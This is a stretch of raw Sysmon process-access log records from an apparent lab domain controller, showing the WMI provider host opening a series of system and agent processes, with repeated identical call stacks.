15:59:48.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028305Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028304Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028303Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028302Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028301Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028300Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028299Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028298Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028297Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028296Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028295Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028294Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028293Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028292Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028291Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028290Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028289Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028288Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028287Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028286Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:48.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program 